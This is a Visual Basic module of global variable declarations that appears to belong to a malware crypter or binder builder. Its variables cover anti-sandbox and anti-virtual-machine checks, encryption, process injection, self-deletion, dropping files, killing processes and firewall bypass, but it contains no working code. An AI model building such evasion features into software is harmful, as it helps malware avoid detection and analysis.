Attribute VB_Name = "PublicVars"
Public sStub As String
Public NewOEP As Long
Public AntiSandBoxie As String
Public AntiAnubis As String
Public AntiJoeBox As String
Public AntiCWSandBox As String
Public AntiThreatExpert As String
Public AntiVMware As String
Public AntiVirtualPC As String
Public AntiVirtualBox As String
Public EncryptionKey As String
Public DelayInSecs As String
Public ValidatePE As String
Public MsgMessage As String
Public MsgOptions As String
Public MsgCaption As String
Public InjectionPath As String
Public MeltStub As String
Public DropAs As String
Public ProcToKill As String
Public DropTo As String
Public AreEditing As String
Public SecsPerFile(1000) As Integer
Public SaveEOF As Boolean
Public SourceOfFile As String
Public CustomStub As Boolean
Public StubPath As String
Public InfoPath As String
Public FWBypass As String


